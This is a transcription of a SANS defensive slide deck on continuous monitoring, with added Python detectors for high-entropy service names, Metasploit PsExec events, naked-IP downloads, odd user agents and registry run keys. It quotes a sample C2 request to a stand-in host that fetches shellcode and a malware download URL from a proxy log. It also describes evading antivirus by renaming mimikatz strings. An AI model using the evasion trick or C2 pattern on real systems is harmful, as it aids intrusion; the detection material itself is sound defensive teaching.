Page 1

Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved

The Seamless Way Continuous Monitoring Can Defend Your Organization against Cyber Attacks

Eric Conrad (GSE #13) Twitter: @eric_conrad
Seth Misenar (GSE #28) Twitter: @sethmisenar

Page 2

Our Approach to Continuous Monitoring

•  We will focus on both threats and vulnerabilities, and highlight mitigation
  –  And not monitoring for the sake of checking a box

•  We will provide proven winning strategies
  –  For example: tracking Microsoft service creation events

•  We will also provide proper focus to both "what" and "how"
  –  For example, later we will discuss monitoring Windows service creation events:
  –  PS C:\> Get-WinEvent -FilterHashtable @{logname='system'; id=7030,7045}

Page 3

Mandiant M-Trends 2015

Organizations made some gains, but attackers still had a free rein in breached environments far too long before being detected—a median of 205 days in 2014 vs. 229 days in 2013. At the same time, the number of organizations discovering these intrusions on their own remained largely unchanged. Sixty-nine percent learned of the breach from an outside entity such as law enforcement. That’s up from 67 percent in 2013 and 63 percent in 2012.[1]

[1] http://cyber.gd/m-trends-2015

Page 4

Let’s Hunt

•  Repeat after me: my network is already owned

•  A hunt team is dedicated to finding intrusions that have evaded prevention and detection

•  “If you're not hunting, you're losing” – Richard Bejtlich

Page 5

A Word on Entropy

•  Entropy means disorder
  –  Strong encryption provides a ciphertext with high entropy
  –  Random string: high entropy
  –  Strings like “download” or “files”: lower entropy

•  This is important because many types of malware (and penetration testing tools like Metasploit) use randomly-generated strings for directory names, file names, X.509 certificate information, etc.
  –  This is done to avoid simple signature matching on the names

•  We can use the malware’s mojo against it by detecting high-entropy:
  –  File names, directory names, X.509 fields, etc.
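The entropy check described on this slide, as an added example (this is not code from the deck or its authors). It computes Shannon entropy in bits per character over a constructed list of names taken from later slides plus two ordinary English words, and reports the ceiling that a name of that length can reach: an n-character string cannot exceed log2(n) bits per character, so the check works best on longer names and should be combined with the other signals the deck raises (7030 errors, change management, PsExec policy).

```python
from collections import Counter
from math import log2

# Constructed sample: service/file names shown on the slides plus ordinary English words.
SAMPLE_NAMES = ["download", "files", "PSEXESVC", "MmvTBipnvGFMNfUs", "llTTAagm",
                "MIehTND", "iRFMmxan", "lksdfhwey"]


def shannon_entropy(s):
    """Shannon entropy of the characters in s, in bits per character."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * log2(c / n) for c in Counter(s).values())


def entropy_ceiling(s):
    """A string of n characters cannot exceed log2(n) bits/char, so short names saturate quickly."""
    return log2(len(s)) if len(s) > 1 else 0.0


def rank_by_entropy(names):
    """Most disordered first: (name, bits/char, ceiling for a name of that length)."""
    rows = [(name, round(shannon_entropy(name), 3), round(entropy_ceiling(name), 3))
            for name in names]
    return sorted(rows, key=lambda r: r[1], reverse=True)


if __name__ == "__main__":
    print(f"{'name':18s} {'bits/char':>9s} {'ceiling':>8s}")
    for name, h, cap in rank_by_entropy(SAMPLE_NAMES):
        print(f"{name:18s} {h:9.3f} {cap:8.3f}")
```

Running it puts the 16-character Metasploit service name (3.75 bits/char) at the top and "files" at the bottom, but it also shows the limit of entropy alone: the 8-character file name "llTTAagm" scores the same 2.5 bits/char as "download", because no 8-character string can exceed 3.0. Rank within similar lengths, and let entropy escalate a service-creation event rather than decide it on its own.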

Page 6

High Entropy Examples

•  BlackHole exploit kit: (screenshot)

•  Metasploit’s PsExec exploit: (screenshot)

•  Tbot: (screenshot)

Page 7

Mandiant M-Trends 2015 on Mimikatz

In nearly all of our investigations, the victims’ anti-virus software failed to hinder Mimikatz, despite the tool’s wide reach and reputation. Attackers typically modified and recompiled the source code to evade detection.[1]

[1] http://cyber.gd/m-trends-2015

Page 8

The Sed Persistent Threat (SPT)

•  Windows mimikatz binary download
  –  70% AV detection rate

•  Compiled mimikatz binary from source (no changes)
  –  31% AV detection rate

•  Compiled mimidogz binary from source
  –  s/mimikatz/mimidogz/g
  –  7% AV detection rate

Page 9

This Dog Can Hunt!

Page 10

Whack-a-Mole

•  I re-scanned mimidogz a few hours later on Virustotal, and Kaspersky suddenly detected it

•  I re-scanned the next morning, and 6 more vendors detected it (13 total)

Page 11

Announcing Mimiyakz: The Sed Persistent Threat (SPT) Strikes Again!

Page 12

Application Whitelisting: The Time has Come

•  Blacklisting will always fail vs. a smart attacker

•  Application Whitelisting is:
  –  Australian Signals Directorate Control #1
  –  20 Critical Security Controls "First Five"

•  Make 2015 the year you deploy application whitelisting

Page 13

"Aren't advanced attackers moving towards code and DLL injection…"

•  Yes they are
  –  Especially vs. systems that are hardened with application whitelisting

•  The cardinal sin of preventive controls:
  –  Set it and forget it

•  Step 1: Deploy application whitelisting (preventive control)

•  Step 2: Monitor blocked applications closely and react in real-time (detection FTW!)

Page 14

Tracking Applocker Alerts

•  For sites that run Applocker, these events should be monitored

•  Audit mode:
  –  8003: <exe or dll> was allowed to run but would have been prevented from running if the AppLocker policy were enforced
  –  8006: <script or msi> was allowed to run but would have been prevented from running if the AppLocker policy were enforced

•  Block/enforce mode:
  –  8004: <exe or dll> was not allowed to run
  –  8007: <script or msi> was not allowed to run[1]

Page 15

Mandiant M-Trends 2015 on Metasploit

•  The Metasploit module used in this case was psexec_command, which allows attackers to run commands on the compromised system. The module executes commands as a Windows service. It leaves a number of forensic artifacts in the Windows system-event log.[1]

[1] http://cyber.gd/m-trends-2015

Page 16

Critical Event 1: Service Creation

•  Critical Security Control 14-9:
  –  Monitor for service creation events and enable process tracking logs. On Windows systems, many attackers use PsExec functionality to spread from system to system. Creation of a service is an unusual event and should be monitored closely. Process tracking is valuable for incident handling.[1]

•  We will demonstrate service creation via PsExec

[1] http://cyber.gd/511_465

Page 17

System Event ID 7045 Normal Service Creation

•  Services are often created when normal software is installed
  –  This event was caused by installing WinPcap
  –  Service creation events that occur on critical systems should be verified against change management requests

•  Services created by use of the Sysinternals PsExec command must be verified
  –  Does your policy allow the use of PsExec?

•  High-entropy service names are highly suspicious!
  –  Service Name: MmvTBipnvGFMNfUs
  –  Service File Name: %SYSTEMROOT%\llTTAagm.exe

Page 18

Attacker uses Metasploit PsExec Exploit

Page 19

How Does this Differ from Normal PsExec?

•  PsExec is a Windows Sysinternals tool

•  PsExec functionality has been added to Metasploit
  –  It is easy to spot the difference between the two versions in Windows event logs

Page 20

System Event ID 7045 Sysinternals vs. Metasploit PsExec

Sysinternals PsExec:
Service Name: PSEXESVC
Service File Name: %SystemRoot%\PSEXESVC.exe
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem

Metasploit PsExec:
Service Name: MIehTND
Service File Name: %SYSTEMROOT%\iRFMmxan.exe
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem

Page 21

System Event ID 7030 Track Errors

•  Sysinternals PsExec generates no errors, but Metasploit’s generates Event ID 7030
  –  The MIehTND service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly
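Putting pages 17, 20 and 21 together, here is an added triage routine (not the deck's own code) for the output of the Get-WinEvent query on page 2. It assumes the 7045 records have already had their service name and file name fields extracted and that 7030 records carry their message text; every record below is constructed for the demo (the NPF entry stands in for the WinPcap install on page 17). A 7030 interactive-service error on the same service escalates a high-entropy 7045 to critical, PSEXESVC is routed to the policy check, and everything else is sent to change management. The entropy threshold is an assumption tuned to the short names on the slides.

```python
import re
from collections import Counter
from math import log2

# Constructed records, as they would be pulled with
# Get-WinEvent -FilterHashtable @{logname='system'; id=7030,7045}
EVENTS = [
    {"id": 7045, "name": "NPF", "path": r"%SystemRoot%\system32\drivers\npf.sys"},
    {"id": 7045, "name": "PSEXESVC", "path": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 7045, "name": "MIehTND", "path": r"%SYSTEMROOT%\iRFMmxan.exe"},
    {"id": 7045, "name": "MmvTBipnvGFMNfUs", "path": r"%SYSTEMROOT%\llTTAagm.exe"},
    {"id": 7030, "message": "The MIehTND service is marked as an interactive service. "
                            "However, the system is configured to not allow interactive "
                            "services. This service may not function properly."},
]

ENTROPY_THRESHOLD = 2.75  # bits/char; assumption tuned to the short names on the slides
INTERACTIVE_RE = re.compile(r"The (\S+) service is marked as an interactive service")


def entropy(s):
    """Shannon entropy in bits per character (same measure as the entropy slide)."""
    n = len(s)
    return -sum(c / n * log2(c / n) for c in Counter(s).values()) if n else 0.0


def services_with_7030(events):
    """Service names that raised the interactive-service error (Event ID 7030)."""
    names = set()
    for e in events:
        if e["id"] == 7030:
            m = INTERACTIVE_RE.search(e.get("message", ""))
            if m:
                names.add(m.group(1))
    return names


def triage(events):
    """Score each 7045 service-creation event; a 7030 on the same service escalates it."""
    errors = services_with_7030(events)
    results = []
    for e in events:
        if e["id"] != 7045:
            continue
        name, path = e["name"], e["path"]
        stem = path.rsplit("\\", 1)[-1].rsplit(".", 1)[0]  # file name without extension
        reasons = []
        if name.upper() == "PSEXESVC":
            # Sysinternals PsExec: a legitimate admin tool, but is its use allowed here?
            verdict = "policy-check"
            reasons.append("Sysinternals PsExec service: verify use against policy")
        else:
            if entropy(name) >= ENTROPY_THRESHOLD:
                reasons.append(f"high-entropy service name ({entropy(name):.2f} bits/char)")
            if entropy(stem) >= ENTROPY_THRESHOLD:
                reasons.append(f"high-entropy file name ({entropy(stem):.2f} bits/char)")
            if name in errors:
                reasons.append("matching 7030 interactive-service error (Metasploit PsExec pattern)")
                verdict = "critical"
            elif reasons:
                verdict = "suspicious"
            else:
                reasons.append("verify against change management")
                verdict = "review"
        results.append({"service": name, "file": path, "verdict": verdict, "reasons": reasons})
    return results


if __name__ == "__main__":
    for r in triage(EVENTS):
        print(f"{r['verdict']:12s} {r['service']:18s} {r['file']}")
        for reason in r["reasons"]:
            print(f"{'':12s}   - {reason}")
```

With the sample records, MIehTND comes out critical (random name, random file name, and the 7030 error), MmvTBipnvGFMNfUs suspicious (random name, no error logged), PSEXESVC goes to the policy check, and NPF is an ordinary review item.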

Page 22

Mandiant M-Trends 2015 Example C2 via HTTP POST

•  The shellcode makes an HTTP POST request to a hard-coded IP address and downloads XOR-encoded shellcode contained within an HTML comment.[1]

POST /evil.txt HTTP/1.0
Accept: */*
Content-Length: 32
Content-Type: application/octet-stream
User-Agent: Evil_UA_String
Host: 1.2.3.4
Pragma: no-cache

<POST_DATA>

[1] http://cyber.gd/m-trends-2015

Page 23

Proxies Rule!

Proxies keep cropping up over and over, because they are fundamentally a sound idea. Every so often someone re-invents the proxy firewall - as a border spam blocker, or a 'web firewall' or an 'application firewall' or 'database gateway' - etc. And these technologies work wonderfully. Why? Because they're a single point where a security-conscious programmer can assess the threat represented by an application protocol, and can put error detection, attack detection, and validity checking in place – Marcus Ranum

Page 24

Proxy Win: Naked Downloads

•  Perl script that parsed http proxy logs to identify downloads of EXEs from ‘naked IPs’; first hit:
  –  172.17.103.3 - - [19/May/2014:15:48:10 -0400] "GET http://101.93.59.108/lksdfhwey/r.exe HTTP/1.0" 200 731 TCP_MISS:DIRECT

•  “Why is a nursing station downloading software from a former Soviet Union country?”
  –  EXE scanned clean by 2 separate antivirus programs (proxy and desktop)

•  PC was compromised, inbound prevention and detection had failed

Page 25

On That Same Note…

•  The URL was:
  –  http://101.93.59.108/lksdfhwey/r.exe

•  Beyond the naked IP, it illustrates other common malware patterns:
  –  Randomly-generated names, directories, function names, etc.
  –  1-character EXE name

•  You can automate searches for these patterns!

Page 26

Let’s Track User Agents

•  HTTP user agents offer high-value data

•  User agents are often “fudged” by malware, in conspicuous ways

Page 27

Common User Agent Substrings

•  Mozilla (Most browsers)
  –  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko

•  Opera (The Opera browser)
  –  User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14

•  Microsoft-CryptoAPI (Windows systems checking CRL servers)
  –  User-Agent: Microsoft-CryptoAPI/6.0

Page 28

Abnormal HTTP User Agents

•  These are not normal:
  –  User-Agent: getURLDown
  –  User-Agent: loadMM
  –  User-Agent: POSTtj
  –  User-Agent: Downloader MLR 1.0.0
  –  User-Agent: FULLSTUFF
  –  User-Agent: GaurdMailRu
  –  User-Agent: GuardMailRu

Page 29

Tracking User Agents

•  Our approach:
  –  Configure your proxy to log user agents
  –  Or your NextGen Firewall, or Bro, etc.

•  Sort from least common to most common
  –  Inspect the least common

•  Sort from longest to shortest
  –  Inspect the shortest

•  Is this approach perfect?
  –  Of course some types of malware can evade this check, and/or use actual legitimate user agent strings
  –  It is a *very* useful approach
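An added example (not the deck's Perl script) that automates both proxy-log hunts from pages 24, 25 and 29 over the same log lines: the naked-IP EXE download check with its two companion patterns (random-looking directory, 1-character EXE name) and the user-agent long tail (least common, shortest, and anything lacking the common substrings from page 27). The log lines are constructed in the Squid-style format shown on page 24, with the user agent appended in quotes on the assumption that the proxy is configured to log it; the internal addresses, 203.0.113.5 and the example.com hosts are made up, and the "random-looking directory" heuristic (8+ characters, at most 20% vowels) is an assumption.

```python
import re
from collections import Counter

# Constructed proxy log lines; the first mirrors the deck's "first hit".
SAMPLE_LOG = """\
172.17.103.3 - - [19/May/2014:15:48:10 -0400] "GET http://101.93.59.108/lksdfhwey/r.exe HTTP/1.0" 200 731 TCP_MISS:DIRECT "loadMM"
172.17.10.21 - - [19/May/2014:15:48:12 -0400] "GET http://www.example.com/index.html HTTP/1.1" 200 5120 TCP_MISS:DIRECT "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
172.17.10.22 - - [19/May/2014:15:48:15 -0400] "GET http://www.example.com/style.css HTTP/1.1" 200 2048 TCP_HIT:NONE "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
172.17.10.23 - - [19/May/2014:15:49:01 -0400] "GET http://www.example.com/app.js HTTP/1.1" 200 9000 TCP_MISS:DIRECT "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
172.17.10.24 - - [19/May/2014:15:49:30 -0400] "GET http://crl.example.com/root.crl HTTP/1.1" 200 1300 TCP_MISS:DIRECT "Microsoft-CryptoAPI/6.0"
172.17.10.25 - - [19/May/2014:15:50:05 -0400] "GET http://www.example.org/ HTTP/1.1" 200 4000 TCP_MISS:DIRECT "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
172.17.103.3 - - [19/May/2014:15:52:44 -0400] "POST http://101.93.59.108/lksdfhwey/gate.php HTTP/1.0" 200 32 TCP_MISS:DIRECT "loadMM"
172.17.10.30 - - [19/May/2014:15:53:10 -0400] "GET http://203.0.113.5/setup/installer.exe HTTP/1.1" 200 200000 TCP_MISS:DIRECT "getURLDown"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<bytes>\d+) (?P<result>\S+)'
    r'(?: "(?P<ua>[^"]*)")?$'
)
URL_RE = re.compile(r'^https?://(?P<host>[^/:]+)(?::\d+)?(?P<path>/[^?]*)?')
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')
KNOWN_UA_SUBSTRINGS = ("Mozilla", "Opera", "Microsoft-CryptoAPI")  # page 27


def parse_line(line):
    """One proxy log line -> dict of fields, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def parse_log(text):
    return [rec for rec in (parse_line(l) for l in text.splitlines()) if rec]


def naked_download_findings(rec):
    """Reasons this request matches the naked-download pattern (empty list if none)."""
    u = URL_RE.match(rec["url"])
    if not u:
        return []
    host, path = u.group("host"), u.group("path") or "/"
    parts = [p for p in path.split("/") if p]
    reasons = []
    if IPV4_RE.match(host) and parts and parts[-1].lower().endswith(".exe"):
        reasons.append("EXE fetched from a naked IP")
        if len(parts[-1][:-4]) == 1:
            reasons.append("1-character EXE name")
        for d in parts[:-1]:
            vowels = sum(ch in "aeiouAEIOU" for ch in d)
            if len(d) >= 8 and vowels / len(d) <= 0.2:  # assumed heuristic
                reasons.append(f"random-looking directory '{d}'")
    return reasons


def scan_naked_downloads(records):
    hits = [(r["client"], r["url"], naked_download_findings(r)) for r in records]
    return [h for h in hits if h[2]]


def user_agent_long_tail(records):
    """Least common first, shortest first, and UAs with none of the common substrings."""
    counts = Counter(r["ua"] for r in records if r.get("ua"))
    return {
        "least_common": sorted(counts.items(), key=lambda kv: (kv[1], kv[0])),
        "shortest": sorted(counts, key=lambda ua: (len(ua), ua)),
        "unknown": [ua for ua in counts if not any(s in ua for s in KNOWN_UA_SUBSTRINGS)],
    }


if __name__ == "__main__":
    records = parse_log(SAMPLE_LOG)
    for client, url, reasons in scan_naked_downloads(records):
        print(f"{client} {url}: {'; '.join(reasons)}")
    tail = user_agent_long_tail(records)
    print("least common:", tail["least_common"][:3])
    print("shortest:", tail["shortest"][:3])
    print("no known substring:", tail["unknown"])
```

Note that the least-common list surfaces Microsoft-CryptoAPI alongside the malware agents: that is the expected noise the deck warns about, which is why the shortest-first sort and the substring check are run as well and the analyst inspects rather than blocks.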

Page 30

Our Approach on the Contagio Crimeware Pcap Collection

Page 31

Mandiant M-Trends 2015 on Persistence

•  Maintaining persistence has long been a hallmark of APT actors, who work to stay in an environment until they’ve completed their mission. But financial actors have increasingly shown their ability to maintain a low profile. In one case, cyber criminals maintained stealthy persistence using well-known Windows startup registry locations to launch their malware. In another, financial threat actors managed to maintain access to an environment for more than five years. We’ve even seen persistence in financial threat actors trying to get back into an environment after being kicked out.[1]

[1] http://cyber.gd/m-trends-2015

Page 32

What does a Malicious Startup Registry Key Look Like?

•  Attacker view: (screenshot)

•  Victim view: (screenshot)

Page 33

Windows Registry Startup Keys

•  Query these keys across all Windows systems
  –  HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  –  HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  –  HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  –  HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

•  Add these (often forgotten)
  –  HKLM\Software\Wow6432node\Microsoft\Windows\CurrentVersion\Run
  –  HKLM\Software\Wow6432node\Microsoft\Windows\CurrentVersion\RunOnce

Page 34

Accessing Registry Keys Remotely

•  Only HKLM (HKEY Local Machine) and HKCU (HKEY Current User) are available via the remote registry service
  –  HKCU is accessed via "HKU," and requires ".DEFAULT" added to the path

•  Example remote registry commands:
  C:\> reg query \\<system>\HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  C:\> reg query \\<system>\HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

Page 35

Example PowerShell Script

•  This script uses PowerShell to wrap remote registry queries

Page 36

Next Step: Long Tail Analysis

1.  Query all startup registry run keys on all systems
2.  Sort in order of duplicates, least to most
3.  Then inspect the least frequently seen startup registry keys
  –  Most organizations find malware

Page 37

Then: Automate

•  The first pass may be somewhat time consuming
  –  But worthwhile

•  Once that process is complete:
  –  Re-run the script nightly
  –  Report any new entries

•  What you will find:
  –  New software installs, both authorized and not
  –  New Malware!
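The procedure from pages 33 through 37 end to end, as an added example; it is not the PowerShell script the deck mentions on page 35. It builds the per-host reg query command strings for the six run keys (mapping HKCU to HKU\.DEFAULT as page 34 shows), parses the text that reg query returns, counts each (key, value name, data) triple across hosts for the long-tail sort, and diffs a run against the previous night's snapshot to report new entries. The three hosts' outputs are constructed, not real captures: ws01 to ws03, CorpAgent, Updater and the odd-looking wsdhfk entry are all made up.

```python
import re

# Run keys from pages 33 and 34; HKCU is reached as HKU\.DEFAULT for remote queries.
RUN_KEYS = [
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run",
    r"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce",
]

KEY_RE = re.compile(r"^HK[A-Z_]+\\")
VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")

# Constructed `reg query` output for three hosts (not real captures).
SAMPLE_HOSTS = {
    "ws01": r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    CorpAgent    REG_SZ    "C:\Program Files\CorpAgent\agent.exe" /background
    Updater    REG_SZ    C:\Program Files\Updater\updater.exe
""",
    "ws02": r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    CorpAgent    REG_SZ    "C:\Program Files\CorpAgent\agent.exe" /background
    Updater    REG_SZ    C:\Program Files\Updater\updater.exe
""",
    "ws03": r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    CorpAgent    REG_SZ    "C:\Program Files\CorpAgent\agent.exe" /background
    wsdhfk    REG_SZ    C:\Users\jsmith\AppData\Roaming\wsdhfk\wsdhfk.exe
""",
}


def remote_query_commands(host):
    """The reg query commands from page 34, one per run key, for a given host."""
    return [f"reg query \\\\{host}\\{key}" for key in RUN_KEYS]


def parse_reg_query(text):
    """Parse reg query style output into (key, value_name, data) tuples."""
    entries, key = [], None
    for line in text.splitlines():
        if KEY_RE.match(line):
            key = line.strip()
            continue
        m = VALUE_RE.match(line) if key else None
        if m:
            entries.append((key, m.group("name"), m.group("data").strip()))
    return entries


def snapshot(per_host):
    """Normalised set of (host, key, name, data) across all queried hosts."""
    return {(host, key.lower(), name.lower(), data.lower())
            for host, text in per_host.items() for key, name, data in parse_reg_query(text)}


def long_tail(per_host):
    """Each distinct (key, name, data) with the hosts carrying it, rarest first (step 2)."""
    hosts_by_entry = {}
    for host, key, name, data in snapshot(per_host):
        hosts_by_entry.setdefault((key, name, data), set()).add(host)
    return sorted(((len(h), entry, sorted(h)) for entry, h in hosts_by_entry.items()),
                  key=lambda row: (row[0], row[1]))


def new_entries(current, baseline):
    """Nightly automation (page 37): entries that appeared since the baseline snapshot."""
    return sorted(current - baseline)


if __name__ == "__main__":
    for count, (key, name, data), hosts in long_tail(SAMPLE_HOSTS):
        print(f"{count:3d} {name:12s} {data}  [{', '.join(hosts)}]")
    last_night = snapshot({h: SAMPLE_HOSTS[h] for h in ("ws01", "ws02")})
    for entry in new_entries(snapshot(SAMPLE_HOSTS), last_night):
        print("NEW:", entry)
```

The rarest row, present on a single host and launching from a user's AppData profile, is exactly the kind of entry step 3 tells the analyst to inspect first; in production the baseline is the previous run's snapshot persisted to disk, and the host list feeds remote_query_commands.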

Page 38

Sec511: Continuous Monitoring and Security Operations

Key Topics
•  Current State Assessment
•  Endpoint Security Architecture
•  Network Security Architecture
•  Security Operations Centers (SOC)
•  Continuous Security Monitoring
•  Network Security Monitoring

What makes this course special?
•  Authored by two GSEs: Seth Misenar (#28), Eric Conrad (#13)
•  1st Cyber Defense course with a day 6 D3TF (Design/Detect/Defend the Flag) competition powered by

•  Twitter: @eric_conrad
•  @sethmisenar

HTTP://SEC511.COM